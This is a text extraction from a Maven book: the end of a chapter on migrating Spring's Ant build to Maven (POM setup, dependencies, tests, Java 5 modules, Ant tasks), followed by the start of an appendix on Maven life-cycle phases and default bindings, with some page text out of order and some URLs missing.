- clean: clean (maven-clean-plugin) – Remove the project build directory, along with any additional directories configured in the POM.
A.1.3. The site Life Cycle

This life cycle is executed in order to generate a web site for your project. It will run any reports that are associated with your project, render your documentation source files into HTML, and even deploy the resulting web site to your server. Maven provides a set of default mojo bindings for this life cycle, effective for all POM packagings, which perform the most common tasks involved in generating the web site for a project. Below is a listing of the phases in the site life cycle, along with a summary of the default bindings.

Life-cycle phases

The site life cycle contains the following phases:

1. pre-site – execute any setup or initialization steps to prepare the project for site generation
2. site – run all associated project reports, and render documentation source files into HTML
3. post-site – execute any actions required to finalize the site generation process, and prepare the generated web site for potential deployment
4. site-deploy – use the distributionManagement configuration in the project's POM to deploy the generated web site files to the web server

Default Life Cycle Bindings

Below are the site life-cycle bindings for the jar packaging. Alongside each, you will find a short description of what that mojo does.

Table A-4: The site life-cycle bindings for the jar packaging

- site: site (maven-site-plugin) – Generate all configured project reports, and render documentation into HTML.
- site-deploy: deploy (maven-site-plugin) – Deploy the generated web site to the web server path specified in the POM distributionManagement section.
A.2. Mojo Parameter Expressions

Mojo parameter values are resolved by way of parameter expressions when a mojo is initialized. This section discusses the expression language used by Maven to inject build state and plugin configuration into mojos. It will summarize the root objects of the build state which are available for mojo expressions. Finally, it will describe the algorithm used to resolve complex parameter expressions. Using the discussion below, along with the published Maven API documentation, mojo developers should have everything they need to extract the build state they require.

A.2.1. Simple Expressions

Maven's plugin parameter injector supports several primitive expressions, which act as a shorthand for referencing commonly used build state objects. These expressions allow a mojo to traverse complex build state, and extract only the information it requires. This reduces the complexity of the code contained in the mojo, and often eliminates dependencies on Maven itself beyond the plugin API. They are summarized below:

Table A-5: Primitive expressions supported by Maven's plugin parameter injector

- ${localRepository} (org.apache.maven.artifact.repository.ArtifactRepository) – This is a reference to the local repository used to cache artifacts during a Maven build.
- ${session} (org.apache.maven.execution.MavenSession) – The current build session. This contains methods for accessing information about how Maven was called, in addition to providing a mechanism for looking up Maven components on-demand.
- ${reactorProjects} (java.util.List<org.apache.maven.project.MavenProject>) – List of project instances which will be processed as part of the current build.
- ${reports} (java.util.List<org.apache.maven.reporting.MavenReport>) – List of reports to be generated when the site life cycle executes.
- ${executedProject} (org.apache.maven.project.MavenProject) – This is a cloned instance of the project instance currently being built. It is used for bridging results from forked life cycles back to the main line of execution.
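As an illustrative sketch of how a mojo consumes one of these primitive expressions (the class and field names below are invented for illustration and are not taken from the book), a Maven 2-style Java mojo declares a field and annotates it with the expression:

import java.util.List;

import org.apache.maven.plugin.AbstractMojo;
import org.apache.maven.plugin.MojoExecutionException;

/**
 * Logs the number of projects in the reactor.
 *
 * @goal count-projects
 */
public class CountProjectsMojo extends AbstractMojo {

    /**
     * Injected from the ${reactorProjects} primitive expression.
     *
     * @parameter expression="${reactorProjects}"
     * @required
     * @readonly
     */
    private List reactorProjects;

    public void execute() throws MojoExecutionException {
        getLog().info("The reactor contains " + reactorProjects.size() + " project(s).");
    }
}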
A.2.2. Complex Expression Roots

In addition to the simple expressions above, Maven supports more complex expressions that traverse the object graph starting at some root object that contains build state. The valid root objects for plugin parameter expressions are summarized below:

Table A-6: A summary of the valid root objects for plugin parameter expressions

- ${basedir} (java.io.File) – The current project's root directory.
- ${project} (org.apache.maven.project.MavenProject) – Project instance which is currently being built.
- ${settings} (org.apache.maven.settings.Settings) – The Maven settings, merged from conf/settings.xml in the Maven application directory and from .m2/settings.xml in the user's home directory.
- ${plugin} (org.apache.maven.plugin.descriptor.PluginDescriptor) – The descriptor instance for the current plugin, including its dependency artifacts.

A.2.3. The Expression Resolution Algorithm

Plugin parameter expressions are resolved using a straightforward algorithm. First, if the expression matches one of the primitive expressions (mentioned above) exactly, then the value mapped to that expression is returned. No advanced navigation can take place using such expressions.

Otherwise, the expression is split at each '.' character, rendering an array of navigational directions. The first is the root object, and must correspond to one of the roots mentioned above. This root object is retrieved from the running application using a hard-wired mapping. From there, the next expression part is used as a basis for reflectively traversing that object's state, much like a primitive expression would. Following standard JavaBeans naming conventions, an expression part named 'child' translates into a call to the getChild() method on that object. The resulting value then becomes the new 'root' object for the next round of traversal. Repeating this, successive expression parts will extract values from deeper and deeper inside the build state. If at some point the referenced object doesn't contain a property that matches the next expression part, this reflective lookup process is aborted. When there are no more expression parts, the value that was resolved last will be returned as the expression's value.
If at this point Maven still has not been able to resolve a value for the parameter expression, it will attempt to find a value in one of two remaining places, resolved in this order:

1. The system properties. Maven will consult the current system properties. This includes properties specified on the command line using the -D command-line option.
2. The POM properties. If a user has specified a property mapping this expression to a specific value in the current POM, an ancestor POM, or an active profile, it will be resolved as the parameter value at this point.

If the parameter is still empty after these two lookups, then the string literal of the expression itself is used as the resolved value. Currently, Maven plugin parameter expressions do not support collection lookups, array index references, or method invocations that don't conform to standard JavaBean naming conventions.

Plugin Metadata

Below is a review of the mechanisms used to specify metadata for plugins. It includes summaries of the essential plugin descriptor, as well as the metadata formats which are translated into plugin descriptors from Java- and Ant-specific mojo source files.

Plugin descriptor syntax

The following is a sample plugin descriptor. Its syntax has been annotated to provide descriptions of the elements.

<plugin>
  <!-- These are the identity elements (groupId/artifactId/version)
   | from the plugin POM.
   |-->
  <groupId>org.apache.maven.plugins</groupId>
  <artifactId>maven-myplugin-plugin</artifactId>
  <version>2.0-SNAPSHOT</version>

  <!-- The description element of the plugin's POM. -->
  <description>Sample Maven Plugin</description>

  <!-- This element provides the shorthand reference for this plugin. For
   | instance, this plugin could be referred to from the command line using
   | the 'myplugin:' prefix.
   |-->
  <goalPrefix>myplugin</goalPrefix>

  <!-- Whether the configuration for this plugin should be inherited from
   | parent to child POMs by default.
   |-->
  <inheritedByDefault>true</inheritedByDefault>

  <!-- This is a list of the mojos contained within this plugin. -->
  <mojos>
    <mojo>
      <!-- The name of the mojo. Combined with the 'goalPrefix' element above,
       | this name allows the user to invoke this mojo from the command line
       | using 'myplugin:do-something'.
       |-->
      <goal>do-something</goal>
| This allows the user to specify that this mojo be executed (via the | <execution> section of the plugin configuration in the POM).Ensure that this other mojo within the same plugin executes before | this one.Determines how Maven will execute this mojo in the context of a | multimodule build. |-> <phase>compile</phase> <!-. then execute that life cycle up to the specified phase. |-> <requiresDirectInvocation>false</requiresDirectInvocation> <!-. but the mojo itself has certain life-cycle | prerequisites. such mojos will | cause the build to fail. it will only | execute once. --> <description>Do something cool.Tells Maven that a valid project instance must be present for this | mojo to execute. it will be executed once for each project instance in the | current build.Tells Maven that this mojo can ONLY be invoked directly.Tells Maven that a valid list of reports for the current project are | required before this plugin can execute. It's restricted to this plugin to avoid creating inter-plugin | dependencies.Some mojos cannot execute if they don't have access to a network | connection. |-> <executeLifecycle>myLifecycle</executeLifecycle> <!-. Mojos that are marked as aggregators should use the | ${reactorProjects} expression to retrieve a list of the project | instances in the current build. If Maven is operating in offline mode. without | also having to specify which phase is appropriate for the mojo's | execution.Which phase of the life cycle this mojo will bind to by default. If the mojo is not marked as an | aggregator.Appendix A: Resources for Plugin Developers <!-.This tells Maven to create a clone of the current project and | life cycle. This is | useful to inject specialized behavior in cases where the main life | cycle should remain unchanged. via the | command line. It is a good idea to provide this. | and specifies a custom life-cycle overlay that should be added to the | cloned life cycle before the specified phase is executed.</description> <!-. regardless of the number of project instances in the | current build. to give users a hint | at where this task should run. If a mojo is marked as an aggregator. | This is useful when the user will be invoking this mojo directly from | the command line. This flag controls whether the mojo requires 275 . |-> <requiresProject>true</requiresProject> <!-. |-> <executePhase>process-resources</executePhase> <!-. |-> <requiresReports>false</requiresReports> <!-.Description of what this mojo does. |-> <executeGoal>do-something-first</executeGoal> <!-.This is optionally used in conjunction with the executePhase element. |-> <aggregator>false</aggregator> <!-.
--> <parameters> <parameter> <!-.plugins. this parameter must be configured via some other section of | the POM.maven.SiteDeployMojo</implementation> <!-.The parameter's name. either via command-line or POM configuration.Tells Maven that the this plugin's configuration should be inherted | from a parent POM by default. |-> <inheritedByDefault>true</inheritedByDefault> <!-. |-> <requiresOnline>false</requiresOnline> <!-.The Java type for this parameter. |-> <alias>outputDirectory</alias> <!-.apache. |-> <implementation>org.site. the | mojo (and the build) will fail when this parameter doesn't have a | value. In Java mojos. --> <language>java</language> <!-.</description> </parameter> </parameters> 276 .Better Builds with Maven | Maven to be online. | It will be used as a backup for retrieving the parameter value. this will often reflect the | parameter field name in the mojo class.Description for this parameter.This is a list of the parameters used by this mojo.This is an optional alternate parameter name for this parameter. If set to | false.Whether this parameter is required to have a value. |-> <editable>true</editable> <!-. |-> <name>inputDirectory</name> <!-. specified in the javadoc comment | for the parameter field in Java mojo implementations.Whether this parameter's value can be directly specified by the | user.The class or script path (within the plugin's jar) for this mojo's | implementation. as in the case of the list of project dependencies. |-> <description>This parameter does something important.File</type> <!-. --> <type>java. If true. |-> <required>true</required> <!-.io. unless the user specifies | <inherit>false</inherit>.The implementation language for this mojo.
WagonManager</role> <!-.manager. as | compared to the descriptive specification above.This is the list of non-parameter component references used by this | mojo. |-> <field-name>wagonManager</field-name> </requirement> </requirements> </mojo> </mojos> </plugin> 277 . The expression used to extract the | parameter value is ${project.File">${project. | | The general form is: | <param-nameparam-expr</param-name> | |-> <configuration> <!-.apache. |-> <requirements> <requirement> <!-. this parameter is named "inputDirectory".WagonManager |-> <role>org.Use a component of type: org.artifact. |-> <inputDirectory implementation="java.For example. Each parameter must | have an entry here that describes the parameter name.File.This is the operational specification of this mojo's parameters.reporting. | along with an optional classifier for the specific component instance | to be used (role-hint).artifact.outputDirectory}</inputDirectory> </configuration> <!-. Finally.Appendix A: Resources for Plugin Developers <!-.apache.outputDirectory}.Inject the component instance into the "wagonManager" field of | this mojo.io.io. Components are specified by their interface class name (role). | and the primary expression used to extract the parameter's value. and it | expects a type of java.maven. the requirement specification tells | Maven which mojo-field should receive the component instance.reporting. parameter type.manager.maven.
Java Mojo Metadata: Supported Javadoc Annotations

The Javadoc annotations used to supply metadata about a particular mojo come in two types. Class-level annotations correspond to mojo-level metadata elements, and field-level annotations correspond to parameter-level metadata elements.

Class-level annotations

The table below summarizes the class-level javadoc annotations which translate into specific elements of the mojo section in the plugin descriptor.

Table A-7: A summary of class-level javadoc annotations (Descriptor Element / Javadoc Annotation / Values / Required?). Rows include aggregator, description, executePhase, executeLifecycle, and the other mojo-level elements; values range over an alphanumeric name (dashes allowed) for the goal, any valid phase name, a life cycle name, and true-or-false flags (defaulting to false, except requiresProject which defaults to true). Only the goal annotation is required.
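To tie these class-level annotations to source code, here is a minimal, hypothetical Java mojo using a few of them (the goal name and log message are invented for illustration):

import org.apache.maven.plugin.AbstractMojo;
import org.apache.maven.plugin.MojoExecutionException;

/**
 * Runs once for the whole reactor, after test-scoped dependencies are resolved.
 *
 * @goal summarize
 * @phase verify
 * @aggregator
 * @requiresDependencyResolution test
 */
public class SummarizeMojo extends AbstractMojo {

    public void execute() throws MojoExecutionException {
        getLog().info("Summarizing the build once for all projects.");
    }
}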
Field-level annotations

The table below summarizes the field-level annotations which supply metadata about mojo parameters. These metadata translate into elements within the parameter, configuration, and requirements sections of a mojo's specification in the plugin descriptor.

Table A-8: Field-level annotations (Descriptor Element / Javadoc Annotation / Values / Required?): alias, ...

Ant Metadata Syntax

The following is a sample Ant-based mojo metadata file. Its syntax has been annotated to provide descriptions of the elements.

<pluginMetadata>
  <!-- Contains the list of mojos described by this metadata file. NOTE:
   | multiple mojos are allowed here, corresponding to the ability to map
   | multiple mojos into a single build script.
   |-->
  <mojos>
    <mojo>
      <!-- The name for this mojo -->
      <goal>myGoal</goal>

      <!-- The default life-cycle phase binding for this mojo -->
      <phase>compile</phase>

      <!-- The dependency scope required for this mojo. Maven will resolve
       | the dependencies in this scope before this mojo executes.
       |-->
      <requiresDependencyResolution>compile</requiresDependencyResolution>

      <!-- Whether this mojo requires a current project instance -->
      <requiresProject>true</requiresProject>

      <!-- Whether this mojo requires access to project reports -->
      <requiresReports>true</requiresReports>
|-> <property>prop</property> <!-.The list of parameters this mojo uses --> <parameters> <parameter> <!-.maven.Another mojo within this plugin to execute before this mojo | executes. |-> <inheritByDefault>true</inheritByDefault> <!-.apache.This is the type for the component to be injected. --> <name>nom</name> <!-.A named overlay to augment the cloned life cycle for this fork | only |-> <lifecycle>mine</lifecycle> <!-.artifact.The parameter name.The property name used by Ant tasks to reference this parameter | value.The phase of the forked life cycle to execute --> <phase>initialize</phase> <!-.Whether this mojo requires Maven to execute in online mode --> <requiresOnline>true</requiresOnline> <!-.Whether the configuration for this mojo should be inherited | from parent to child POMs by default.This describes the mechanism for forking a new life cycle to be | executed prior to this mojo executing.Whether this parameter is required for mojo execution --> <required>true</required> 280 .Whether this mojo operates as an aggregator --> <aggregator>true</aggregator> <!-. |-> <execute> <!-. |-> <goal>goal</goal> </execute> <!-.This is an optional classifier for which instance of a particular | component type should be used.List of non-parameter application components used in this mojo --> <components> <component> <!-.ArtifactResolver</role> <!-. |-> <requiresDirectInvocation>true</requiresDirectInvocation> <!-. --> <role>org.Whether this mojo must be invoked directly from the command | line.resolver.Better Builds with Maven <!-. |-> <hint>custom</hint> </component> </components> <!-.
If this is specified.The description of what the mojo is meant to accomplish --> <description> This is a test. this element will provide advice for an | alternative parameter to use instead.Appendix A: Resources for Plugin Developers <!-.Whether the user can edit this parameter directly in the POM | configuration or the command line |-> <readonly>true</readonly> <!-. </description> <!-. |-> <deprecated>Use another mojo</deprecated> </mojo> </mojos> </pluginMetadata> 281 .maven.When this is specified.apache.MavenProject</type> <!-. it provides advice on which alternative mojo | to use.The description of this parameter --> <description>Test parameter</description> <!-.An alternative configuration name for this parameter --> <alias>otherProp</alias> <!-.artifactId}</defaultValue> <!-. |-> <deprecated>Use something else</deprecated> </parameter> </parameters> <!-.property}</expression> <!-.The expression used to extract this parameter's value --> <expression>${my.The Java type of this mojo parameter --> <type>org.project.The default value provided when the expression won't resolve --> <defaultValue>${project. .
B.1. Standard Directory Structure

Table B-1: Standard directory layout for Maven project content

- pom.xml – Maven's POM, which is always at the top-level of a project.
- LICENSE.txt – A license file is encouraged for easy identification by users and is optional.
- README.txt – A simple note which might help first time users and is optional.
- src/main/java/ – Standard location for application sources.
- src/main/resources/ – Standard location for application resources.
- src/main/filters/ – Standard location for resource filters.
- src/main/assembly/ – Standard location for assembly filters.
- src/main/config/ – Standard location for application configuration files.
- src/test/java/ – Standard location for test sources.
- src/test/resources/ – Standard location for test resources.
- src/test/filters/ – Standard location for test resource filters.
- target/ – Directory for all generated output. This would include compiled classes, the generated site or anything else that might be generated as part of your build.
- target/generated-sources/<plugin-id> – Standard location for generated sources. For example, you may generate some sources from a JavaCC grammar.
B.2. Maven's Super POM

<project>
  <modelVersion>4.0.0</modelVersion>
  <name>Maven Default Project</name>

  <!-- Repository Conventions -->
  <repositories>
    <repository>
      <id>central</id>
      <name>Maven Repository Switchboard</name>
      <layout>default</layout>
      <url>http://repo1.maven.org/maven2</url>
      <snapshots>
        <enabled>false</enabled>
      </snapshots>
    </repository>
  </repositories>

  <!-- Plugin Repository Conventions -->
  <pluginRepositories>
    <pluginRepository>
      <id>central</id>
      <name>Maven Plugin Repository</name>
      <url>http://repo1.maven.org/maven2</url>
      <layout>default</layout>
      <snapshots>
        <enabled>false</enabled>
      </snapshots>
      <releases>
        <updatePolicy>never</updatePolicy>
      </releases>
    </pluginRepository>
  </pluginRepositories>

  <!-- Reporting Conventions -->
  <reporting>
    <outputDirectory>target/site</outputDirectory>
  </reporting>
  ...
</project>
B.3. Maven's Default Build Life Cycle

- validate – Validate the project is correct and all necessary information is available.
- generate-sources – Generate any source code for inclusion in compilation.
- process-sources – Process the source code, for example to filter any values.
- generate-resources – Generate resources for inclusion in the package.
- process-resources – Copy and process the resources into the destination directory, ready for packaging.
- compile – Compile the source code of the project.
- process-classes – Post-process the generated files from compilation, for example to do byte code enhancement on Java classes.
- generate-test-sources – Generate any test source code for inclusion in compilation.
- process-test-sources – Process the test source code, for example to filter any values.
- generate-test-resources – Create resources for testing.
- process-test-resources – Copy and process the resources into the test destination directory.
- test-compile – Compile the test source code into the test destination directory.
- test – Run tests using a suitable unit testing framework. These tests should not require the code be packaged or deployed.
- package – Take the compiled code and package it in its distributable format, such as a JAR.
- pre-integration-test – Perform actions required before integration tests are executed. This may involve things such as setting up the required environment.
- integration-test – Process and deploy the package if necessary into an environment where integration tests can be run.
- post-integration-test – Perform actions required after integration tests have been executed. This may include cleaning up the environment.
- verify – Run any checks to verify the package is valid and meets quality criteria.
- install – Install the package into the local repository, for use as a dependency in other projects locally.
- deploy – Done in an integration or release environment, copies the final package to the remote repository for sharing with other developers and projects.
|
https://pt.scribd.com/doc/37780726/BetterBuildsWithMaven-1-0-2
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
public class ServerCloneException extends CloneNotSupportedException
A ServerCloneException is thrown if a remote exception occurs during the cloning of a UnicastRemoteObject.
As of release 1.4, this exception has been retrofitted to conform to the general purpose exception-chaining mechanism. The "nested exception" that may be provided at construction time and accessed via the public detail field is now known as the cause, and may be accessed via the Throwable.getCause() method, as well as the aforementioned "legacy field." Invoking the method Throwable.initCause(Throwable) on an instance of ServerCloneException always throws IllegalStateException.

See Also: UnicastRemoteObject.clone(), Serialized Form
Methods inherited from class java.lang.Throwable: addSuppressed, fillInStackTrace, getLocalizedMessage, getStackTrace, getSuppressed, initCause, printStackTrace, printStackTrace, printStackTrace, setStackTrace, toString
Methods inherited from class java.lang.Object: clone, equals, finalize, getClass, hashCode, notify, notifyAll, wait, wait, wait
public Exception detail
This field predates the general-purpose exception chaining facility. The Throwable.getCause() method is now the preferred means of obtaining this information.
public ServerCloneException(String s)
Constructs a ServerCloneException with the specified detail message.
Parameters:
s - the detail message.
public ServerCloneException(String s, Exception cause)
Constructs a ServerCloneException with the specified detail message and cause.
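For illustration only, a minimal program that exercises both accessors described above might look like the sketch below; the class name, the Cloneable implementation, and the unexport calls are assumptions of the sketch rather than part of this API documentation:

import java.rmi.RemoteException;
import java.rmi.server.ServerCloneException;
import java.rmi.server.UnicastRemoteObject;

public class CloneDemo extends UnicastRemoteObject implements Cloneable {

    public CloneDemo() throws RemoteException {
        super(); // exports this object on an anonymous port
    }

    public static void main(String[] args) throws Exception {
        CloneDemo original = new CloneDemo();
        try {
            CloneDemo copy = (CloneDemo) original.clone();
            System.out.println("clone succeeded: " + copy);
            UnicastRemoteObject.unexportObject(copy, true);
        } catch (ServerCloneException e) {
            // Preferred since 1.4: the chained cause
            System.err.println("clone failed, cause: " + e.getCause());
            // Legacy access via the public detail field still works
            System.err.println("legacy detail field: " + e.detail);
        } finally {
            UnicastRemoteObject.unexportObject(original, true);
        }
    }
}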
|
http://docs.oracle.com/javase/7/docs/api/java/rmi/server/ServerCloneException.html
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Can someone tell me if the following is actually possible, and if it is then
perhaps someone could point me to some code that explains how to do it, if
possible in really simple baby steps. Assume i have next to no knowledge of
tomcat or developing in the java platform at all (the reason being I am new
to this but have over 15 years of development experience and can usually
pick up this stuff very quickly with a few sample files, but it seems
jackrabbit is ever evolving and there is simply not enough sample projects
for people like myself to look at).
I have jackrabbit setup and running. I can access it via, so far so good.
Now I have another application written in java on the same machine that
jackrabbit is running on. I would like to talk to jackrabbit from that
machine. I believe this is possible using JNDI. Is this possible?
There is sample code on the jackrabbit site that states the following...
========================
import javax.jcr.Repository;
import javax.naming.Context;
import javax.naming.InitialContext;
Context context = new InitialContext(...);
Repository repository = (Repository) context.lookup(...);
========================
What goes in the place of the "..."?
I tried the following...
InitialContext ctx = new InitialContext() ;
Context environment = (Context) ctx.lookup("java:comp/env");
Repository repo = (Repository) environment.lookup("jackrabbit.repository");
And also this...
InitialContext ctx = new InitialContext() ;
Repository repo = (Repository) ctx.lookup("jackrabbit.repository");
No luck there either. The reason I am trying "jackrabbit.repository" is
because in my "Tomcat6/jackrabbit" folder is a file called
"bootstrap.properties" that says the "repository.home=jackrabbit.repository"
and also because in my "Tomcat/webapps/jackrabbit/WEB-INF/web.xml" is the
following...
<init-param>
<param-name>repository-name</param-name>
<param-value>jackrabbit.repository</param-value>
<description>Repository Name under which the repository is
registered via JNDI/RMI</description>
</init-param>
Here is my bootstrap.properties file...
java.naming.factory.initial=org.apache.jackrabbit.core.jndi.provider.DummyInitialContextFactory
repository.home=jackrabbitrepo
rmi.enabled=true
repository.config=jackrabbitrepo/repository.xml
repository.name=jackrabbit.repository
rmi.host=localhost
java.naming.provider.url=http\://
jndi.enabled=true
rmi.port=0
I hope someone can help me. It's been 8 days of solid crunching around with
Jackrabbit and I know it can do what I want, it's just a matter of trying to
keep digging at it with my blunt spoon (or at the moment it's more like
trying to break into a bank vault full of nice yummy gold by smashing my
head against the safe door). I will persist though since I think it is great
technology and just needs a bit more documentation.
Cheers,
Kent.
--
Sent from the Jackrabbit - Users mailing list archive at Nabble.com.
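For reference, a lookup consistent with the rmi.* settings above, using the jackrabbit-jcr-rmi client library instead of JNDI, would look roughly like the sketch below. The registry port (1099), the credentials, and the assumption that rmi.port=0 falls back to the default registry port are unverified guesses, and jackrabbit-jcr-rmi (plus the JCR API jar) must be on the classpath:

import javax.jcr.Repository;
import javax.jcr.Session;
import javax.jcr.SimpleCredentials;

import org.apache.jackrabbit.rmi.client.ClientRepositoryFactory;

public class RemoteRepositoryLookup {
    public static void main(String[] args) throws Exception {
        // "jackrabbit.repository" matches repository.name in bootstrap.properties;
        // host and port are assumptions based on rmi.host=localhost above.
        ClientRepositoryFactory factory = new ClientRepositoryFactory();
        Repository repository =
                factory.getRepository("rmi://localhost:1099/jackrabbit.repository");

        Session session = repository.login(
                new SimpleCredentials("admin", "admin".toCharArray()));
        try {
            System.out.println("Connected, root node: "
                    + session.getRootNode().getPath());
        } finally {
            session.logout();
        }
    }
}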
|
http://mail-archives.apache.org/mod_mbox/jackrabbit-users/200908.mbox/%3C25101779.post@talk.nabble.com%3E
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Hi all, I'm new at Python, and I've got a few questions. First I'll explain what I'm trying to do: I'm writing a win32 application that needs a script interpreter to extend functionality (duh). I want the program to be only 1 binary, so I have to link it into the executable. I read the FAQ about the module importing problem, and that's not going to be a problem, because I don't want to use any external modules. I only want the interpreter, and no libraries/modules.

I know I'm going to lose a lot of functionality this way, but that's not going to be much of a problem. The scripting isn't going to perform any complicated tasks, and besides, I want complete control over the script. I want to limit the script's input/output to only my API. And if I ever need the external modules in the future, I'll see what I can do about it then.

Another problem is that I'll be loading multiple source files, so I have to put those into different namespaces, to avoid clashes. I don't think that this is such a big problem, I just haven't looked into this yet.

So, to sum it up:
- Getting rid of all the modules, so I only have the Interpreter.
- Being able to set the namespace of a particular piece of code.

Any hints / tips are greatly appreciated.

Yours,

Jean-Paul Kogelman
Parox Software b.v.
|
https://mail.python.org/pipermail/python-list/2000-November/050866.html
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
plone.jsonapi.routes 0.2
Plone JSON API -- Routes
plone.jsonapi.routes
Table of Contents
Introduction
This is an add-on package for plone.jsonapi.core which provides some basic URLs for Plone standard contents (and more).
Motivation
The routes package is built on top of the plone.jsonapi.core package to allow Plone developers to build modern (JavaScript) web UIs which communicate through a RESTful API with their Plone site.
Compatibility
The plone.jsonapi.routes is compatible with Plone 4.
Installation
The official release is on pypi, so you have to simply include plone.jsonapi.routes to your buildout config.
Example:
[buildout]
...

[instance]
...
eggs =
    ...
    plone.jsonapi.core
    plone.jsonapi.routes
The routes for the standard Plone content types get registered on startup.
API URL
After installation, the Plone API routes are available below the plone.jsonapi.core root URL (@@API) under the base path /plone/api/1.0.
Note
Please see the documentation of plone.jsonapi.core for the API root URL.
There is also an overview of the registered routes which can be accessed here:
API Routes
This is an overview of the provided API Routes. The basic content routes all provide an interface for CRUD operations.
Important
The optional UID in the create, update and delete URLs specifies the target container in which to create the content. If this is omitted, the API expects a parameter parent_uid in the request body JSON. If this is also not found, an API Error will be returned.
Request Parameters
All GET resources accept request parameters.
Examples
Search all content created by admin
Search for all documents created by admin which contain the text Open-Source
Response Format
The response format is for all resources the same.
Example:
{
  url: "",
  count: 0,
  _runtime: 0.0021538734436035156,
  items: [ ]
}
- url
- The resource root url
- count
- Count of found results
- _runtime
- The processing time in milliseconds after the request was received until the response was prepared.
- items
- An array of result items
Content URLs
All content information is dynamically gathered from the content's schema definition through the IInfo adapter. It is possible to define a more specific adapter for your content type to control the data returned by the API.
Special URLs
Beside the content URLs described above, there are some other resources available in this extension.
Write your own API
This package is designed to provide an easy way for you to write your own JSON API for your custom Dexterity content types.
The plone.jsonapi.example package shows how to do so.
Example
Lets say you want to provide a simple CRUD JSON API for your custom Dexterity content type. You want to access the API directly from the plone.jsonapi.core root URL ().
First of all, you need to import the CRUD functions of plone.jsonapi.routes:
from plone.jsonapi.routes.api import get_items
from plone.jsonapi.routes.api import create_items
from plone.jsonapi.routes.api import update_items
from plone.jsonapi.routes.api import delete_items
To register your custom routes, you need to import the router module of plone.jsonapi.core. The add_route decorator of this module will register your function with the api framework:
from plone.jsonapi.core import router
The next step is to provide the a function which get called by the plone.jsonapi.core framework:
@router.add_route("/example", "example", methods=["GET"])
def get(context, request):
    return {}
Lets go through this step by step…
The @router.add_route(…) registers the decorated function with the framework. So the function will be invoked when someone sends a request to @@API/example.
The framework registers the decorated function with the key example. We also provide the HTTP Method GET which tells the framework that we only want to get invoked on a HTTP GET request.
When the function gets invoked, the framework provides a context and a request. The context is usually the Plone site root, because this is where the base view (@@API) is registered. The request contains all needed parameters and headers from the original request.
At the moment we return an empty dictionary. Lets provide something more useful here:
@router.add_route("/example", "example", methods=["GET"])
def get(context, request=None):
    items = get_items("my.custom.type", request, uid=None, endpoint="example")
    return {
        "count": len(items),
        "items": items,
    }
The get_items function of the plone.jsonapi.routes.api module does all the heavy lifting here. It searches the catalog for my.custom.type contents, parses the request for any additional parameters, or returns all information from the woken-up object if the uid is given.
The return value is a list of dictionaries, where each dictionary represents the information of one result, be it a catalog result or the full information set of an object.
Note
without the uid given, only catalog brains are returned
Now we need a way to handle the uid with this function. Therefore we can simple add another add_route decorator around this function:
@router.add_route("/example", "example", methods=["GET"])
@router.add_route("/example/<string:uid>", "example", methods=["GET"])
def get(context, request=None, uid=None):
    items = get_items("my.custom.type", request, uid=uid, endpoint="example")
    return {
        "count": len(items),
        "items": items,
    }
This function now handles URLs like @@API/example/4b7a1f… as well and invokes the function directly with the provided UID as the parameter. The get_items function tries to find the object with the given UID and provides the full information of the woken-up object.
Note
API URLs which contain the UID are automatically generated with the provided endpoint
The CREATE, UPDATE and DELETE functionality is basically identical with the basic VIEW function above, so here in short:
# CREATE
@router.add_route("/example/create", "example_create", methods=["POST"])
@router.add_route("/example/create/<string:uid>", "example_create", methods=["POST"])
def create(context, request, uid=None):
    items = create_items("plone.example.todo", request, uid=uid, endpoint="example")
    return {
        "count": len(items),
        "items": items,
    }

# UPDATE
@router.add_route("/example/update", "example_update", methods=["POST"])
@router.add_route("/example/update/<string:uid>", "example_update", methods=["POST"])
def update(context, request, uid=None):
    items = update_items("plone.example.todo", request, uid=uid, endpoint="example")
    return {
        "count": len(items),
        "items": items,
    }

# DELETE
@router.add_route("/example/delete", "example_delete", methods=["POST"])
@router.add_route("/example/delete/<string:uid>", "example_delete", methods=["POST"])
def delete(context, request, uid=None):
    items = delete_items("plone.example.todo", request, uid=uid, endpoint="example")
    return {
        "count": len(items),
        "items": items,
    }
See it in action
A small tec demo is available on youtube:
Changelog
0.2 - 2014-03-05
FIXED ISSUES
-: Dexterity support
-: Update on UID Urls not working
-: Started with some basic browsertests
API CHANGES
API root url provided.
Image and file fields are now rendered as a nested structure, e.g:
{
  data: b64,
  size: 42,
  content_type: "image/png"
}
Workflow info is provided where possible, e.g:
{
  status: "Private",
  review_state: "private",
  transitions: [
    {
      url: ".../content_status_modify?workflow_action=submit",
      display: "Puts your item in a review queue, so it can be published on the site.",
      value: "submit"
    },
  ],
  workflow: "simple_publication_workflow"
}
0.1 - 2014-01-23
- first public release
- Author: Ramon Bartl
- License: MIT
- Categories
- Package Index Owner: ramonski, jdinuncio
- DOAP record: plone.jsonapi.routes-0.2.xml
|
https://pypi.python.org/pypi/plone.jsonapi.routes/0.2
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Easier Immutable Objects in C# and VB
A common pain point in .NET programming is the amount of boilerplate code necessary to implement immutable objects. Unlike a normal class, an immutable class requires that each property have an explicitly defined backing store. And of course a constructor is needed to tie everything together.
Under a new draft specification, C# and VB will be adding what they are calling a “record class”. This is essentially an immutable class defined solely by its constructor. Here is an example from the specification:
public record class Cartesian(double x: X, double y: Y);
In addition to the constructor, the compiler will automatically create:
- A read-only property for each parameter
- An Equals function
- A GetHashCode override
- A ToString Override
- An “is” Operator, known as “Matches” in VB
The “is/Matches” operator is used in pattern matching, which we will cover in tomorrow’s article. Aside from that, record classes are a lot like C# anonymous types. (VB anonymous types differ in that they are mutable by default.) Microsoft is looking into ways to reconcile the two concepts, especially given the current limitation about not exposing anonymous types beyond their current assembly.
A common feature of immutable types is the ability to create copies of the object with one or more fields updated. Though not in the specification yet, here is one option they are considering for C#.
var x1 = new MyRecord(1, 2, 3);
var x2 = x1 with B: 16;
Console.WriteLine(x2); // prints something like "A = 1, B = 16, C = 3"
Extending Record Classes
In the Cartesian example class, you may have noticed that it ended with a semi-colon. This is to indicate that the class has no body other than what the compiler provides.
Instead of the semi-colon you can provide a set of braces like you would for a normal class. You would still get the same compiler-generated code, but have the ability to add additional properties and methods as you see fit.
Other Limitations
For the time being only record classes are supported. In theory, record structs could be added using the same basic syntax and concepts.
Library Concerns
A serious limitation of immutable types in .NET is the lack of library support. Imagine that you are a middle tier developer. Your normal day-to-day tasks probably involve asking an ORM for some objects out of the database, which you then serialize as SOAP-XML or JSON for a one-way or round-trip to the client.
